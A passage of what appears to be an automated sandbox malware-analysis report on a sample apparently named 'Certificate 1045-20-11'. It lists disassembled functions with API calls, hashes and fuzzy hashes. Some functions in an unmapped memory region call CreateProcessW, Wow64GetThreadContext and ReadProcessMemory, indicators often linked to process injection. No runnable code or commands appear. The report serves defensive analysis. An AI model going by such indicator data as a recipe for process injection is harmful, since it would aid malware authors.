                                                                                  • Part of subcall function 00843D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00901148,00901130,?,?,?,?,00843AA3,?), ref: 00843DC8
                                                                                  • Part of subcall function 00843D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00843AA3,?), ref: 00843E48
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00843AB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                • String ID:
                                                                                • API String ID: 924797094-0
                                                                                • Opcode ID: 6d8e7486179619e381caf0bbe164b9b232169b1dae26d0358402dcdbdb1b38e2
                                                                                • Instruction ID: 2640ff40c57f85a118d2e4d2403a9763e303acdce7d40c463badd0addd9c980b
                                                                                • Opcode Fuzzy Hash: 6d8e7486179619e381caf0bbe164b9b232169b1dae26d0358402dcdbdb1b38e2
                                                                                • Instruction Fuzzy Hash: FC119D719183459FC700EF69E84990EFBF9FB94710F00891EF885C72A2DB709984CB92
                                                                                Function 0086E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 0086EA29
                                                                                • __close_nolock.LIBCMT ref: 0086EA42
                                                                                  • Part of subcall function 00867BDA: __getptd_noexit.LIBCMT ref: 00867BDA
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                • String ID:
                                                                                • API String ID: 1046115767-0
                                                                                • Opcode ID: 2d4ce43a34eb41ec2348b8b94e9a070415de56b6feecde299cb22b37b4b842ac
                                                                                • Instruction ID: 7f9bdd68946c1f489bc4ed7f32115e83f443216fc3fd119c56185452c9450b14
                                                                                • Opcode Fuzzy Hash: 2d4ce43a34eb41ec2348b8b94e9a070415de56b6feecde299cb22b37b4b842ac
                                                                                • Instruction Fuzzy Hash: F711C2768196648ED712BFACC8813187A61FF91336F270340E530DF1E2DBB488009AE2
                                                                                Function 0085F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0086395C: __FF_MSGBANNER.LIBCMT ref: 00863973
                                                                                  • Part of subcall function 0086395C: __NMSG_WRITE.LIBCMT ref: 0086397A
                                                                                  • Part of subcall function 0086395C: RtlAllocateHeap.NTDLL(00C60000,00000000,00000001,00000001,00000000,?,?,0085F507,?,0000000E), ref: 0086399F
                                                                                • std::exception::exception.LIBCMT ref: 0085F51E
                                                                                • __CxxThrowException@8.LIBCMT ref: 0085F533
                                                                                  • Part of subcall function 00866805: RaiseException.KERNEL32(?,?,0000000E,008F6A30,?,?,?,0085F538,0000000E,008F6A30,?,00000001), ref: 00866856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3902256705-0
                                                                                • Opcode ID: f38800e2e93d445a8d8ec99e84baa0bb8bf14f3cf39cdb74dd21ec6c4d02c92d
                                                                                • Instruction ID: 879ed22648feada07786b47dd3c491723e9b83982c6ab24ce105e22dd39bcca5
                                                                                • Opcode Fuzzy Hash: f38800e2e93d445a8d8ec99e84baa0bb8bf14f3cf39cdb74dd21ec6c4d02c92d
                                                                                • Instruction Fuzzy Hash: 6AF0A43110421EA7DB04BFADD801ADE77ACFF00355F608539FF08D2182EBB0D65886A6
                                                                                Function 008635E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • __lock_file.LIBCMT ref: 00863629
                                                                                  • Part of subcall function 00864E1C: __lock.LIBCMT ref: 00864E3F
                                                                                • __fclose_nolock.LIBCMT ref: 00863634
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: 2ba9a145e1c2dce1b3bd2a8cc18d3e23fcdacb8ad4b77465b1a5ecc9dcf64cc6
                                                                                • Instruction ID: cf33b8334a606fcc3c19a1e7a85c628e438d7e1e2f10ed253cbe2060106cf74f
                                                                                • Opcode Fuzzy Hash: 2ba9a145e1c2dce1b3bd2a8cc18d3e23fcdacb8ad4b77465b1a5ecc9dcf64cc6
                                                                                • Instruction Fuzzy Hash: A0F0BB71901204AAD7127BBDC80676E76A0FF50334F278118E421EB2D1D77C8611AB97
                                                                                Function 00EAEDF5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00EAF5B3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAF649
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAF66B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction ID: 62c343b49f6cde4bc4b9947e19211c105b0f197715b89c6d30e26086f7959747
                                                                                • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction Fuzzy Hash: 1612D124E14658C6EB24DF64D8507DEB232EF68300F1060E9D10DEB7A5E77A5E81CF5A
                                                                                Function 00862957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __flush.LIBCMT ref: 00862A0B
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __flush__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 4101623367-0
                                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction ID: ceea64707cbac7962b6344974bb51a8c9b92763238c30a4ff67d3f3bd016867f
                                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction Fuzzy Hash: FA41A831700F169FDB2C8EA9C88196E7BA6FF84361F2585BDE855CB280D6B4DD418B40
                                                                                Function 0085ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 0768137be7ee1ac7a752609c9ac8ec326336cabbfe5a25ad14ba4bf76a84e769
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: C631E570A00109DBD718DF1CC884A69FBB6FF49342B6486A5E809CB256DB31EEC5CF80
                                                                                Function 008A040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: db599df27234dd4fcedd6b6fedd48dd2771acfbb40ee673b5144f56303bbb5e6
                                                                                • Instruction ID: a88a9af95911ac6e0f4c046fefd6d74569a754180b74a0f5df53c1b2628249b1
                                                                                • Opcode Fuzzy Hash: db599df27234dd4fcedd6b6fedd48dd2771acfbb40ee673b5144f56303bbb5e6
                                                                                • Instruction Fuzzy Hash: 7031C675504528DFDF01EF14D09066E7BB0FF4A325F20844AEA96AF786DB74A905CF82
                                                                                Function 008B9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: f0d168f74adedd9425d392388bf58f9d8447c9ae4a6c98e3cc43f68d97b9dfd6
                                                                                • Instruction ID: f53d402fd89fc061d654055c06c5e0a25de151580261a05a6b3060a3b4a17e5e
                                                                                • Opcode Fuzzy Hash: f0d168f74adedd9425d392388bf58f9d8447c9ae4a6c98e3cc43f68d97b9dfd6
                                                                                • Instruction Fuzzy Hash: 3E415D745046118FDB24DF18C484B1ABBF0FF45309F1989ACE99A8B362D772E849CF52
                                                                                Function 008441A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00844214: FreeLibrary.KERNEL32(00000000,?), ref: 00844247
                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008439FE,?,00000001), ref: 008441DB
                                                                                  • Part of subcall function 00844291: FreeLibrary.KERNEL32(00000000), ref: 008442C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Free$Load
                                                                                • String ID:
                                                                                • API String ID: 2391024519-0
                                                                                • Opcode ID: d0815c71ef72bc0a2ba46544d3385a16af904adbbd5de6d9eae5b9d453673e10
                                                                                • Instruction ID: abc42f79ee86066a4e074668ce0e8890fd88f64fbaf7478235cc709166ecda95
                                                                                • Opcode Fuzzy Hash: d0815c71ef72bc0a2ba46544d3385a16af904adbbd5de6d9eae5b9d453673e10
                                                                                • Instruction Fuzzy Hash: B711A73170031EAADB10BF78DC06FAEB7A5FF40704F108429B596E61C2DFB49A019B61
                                                                                Function 008B9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: fe1caa43bdee248097db7ed423aa185af9c1f1d26e2dd19955c49c0326596ba5
                                                                                • Instruction ID: e45eeb5fed204e66a416e9d2213713e64aa4c9de1b064460260e47b1bf6ed5a6
                                                                                • Opcode Fuzzy Hash: fe1caa43bdee248097db7ed423aa185af9c1f1d26e2dd19955c49c0326596ba5
                                                                                • Instruction Fuzzy Hash: BB21F470508605CFDB24DF68C444A1ABBF1FF85346F154A68EA9A8B362D731E849CF52
                                                                                Function 0086AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 0086AFC0
                                                                                  • Part of subcall function 00867BDA: __getptd_noexit.LIBCMT ref: 00867BDA
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                                • String ID:
                                                                                • API String ID: 1144279405-0
                                                                                • Opcode ID: c63854029d55fb7202f54a9acb0cd6162fe2ce4de5b0915668fbcf6f3fade92b
                                                                                • Instruction ID: c2727b090bb28cc4ccaf9482f7c64ff07b43c67e4da718a8bb161c9d69d42ca8
                                                                                • Opcode Fuzzy Hash: c63854029d55fb7202f54a9acb0cd6162fe2ce4de5b0915668fbcf6f3fade92b
                                                                                • Instruction Fuzzy Hash: 0711BF72818A549FD7126FA898027693BA0FF81339F274250E430DF1E2DBB58D509BA3
                                                                                Function 008439DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                • Instruction ID: 808403c5987ba7dafe5e253628b762f54659dde43e3e8727b9a32a79723576da
                                                                                • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                • Instruction Fuzzy Hash: 5501313150010DAECF05EFA8C8928FEBB74FF21344F148029B566E72A5EA309A49DB61
                                                                                Function 00862AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock_file.LIBCMT ref: 00862AED
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2597487223-0
                                                                                • Opcode ID: b914d67d1cd8498f1a6d4bb4e1c6442f0a6a671322de896ae9c825b5b75a74e2
                                                                                • Instruction ID: 763d6df0bcbf7cd54620557a682a133cea30f89358505eacdb4163666a5b0b64
                                                                                • Opcode Fuzzy Hash: b914d67d1cd8498f1a6d4bb4e1c6442f0a6a671322de896ae9c825b5b75a74e2
                                                                                • Instruction Fuzzy Hash: CCF0F631500619EBDF22AFBC8C0279F3AA1FF00321F178455F410DB191D7B98A22EB92
                                                                                Function 00844252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,008439FE,?,00000001), ref: 00844286
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: b6a634960b4022d31726fe25d73fffcf301438190ac3de8fd247368e91c98a27
                                                                                • Instruction ID: 9c0d25911d3ee0cd0fd639c4bf7890d9cf8223d421ba03613f72d8bafd354a66
                                                                                • Opcode Fuzzy Hash: b6a634960b4022d31726fe25d73fffcf301438190ac3de8fd247368e91c98a27
                                                                                • Instruction Fuzzy Hash: DBF0157150572ACFCB349F64E894916FBE5FF0432A3259A3EF1D6C2610C7B29940DB50
                                                                                Function 008440A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008440C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                • Opcode ID: 0986216b45c5f05d1cf72e7896380e20cd4bb26514609ae8fd86bf557b706467
                                                                                • Instruction ID: 96450a7b78c49a8d0299c10f5c68091cd6f297d8461e0e740d07ad4adb59ec6b
                                                                                • Opcode Fuzzy Hash: 0986216b45c5f05d1cf72e7896380e20cd4bb26514609ae8fd86bf557b706467
                                                                                • Instruction Fuzzy Hash: 70E0CD365002245BC711E658DC46FEA77ADEF88690F0900B5F905D7244D974D9818691
                                                                                Function 00EAFDF4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00EAFE09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: fed5a2265177d54c3a6ba9f51e81aa28f64bb380388bed86736f44a7ff4e5bcc
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: FAE09A7494010DAFDB10DFA4D54969E7BB4EF04311F1045A1FD05A6691DA309E548A62
                                                                                Function 00EAFDF8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00EAFE09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: 842d5eb2b9a384790514d25cc4a9c5c69cd99b7317580278a6d694fe8bf6a972
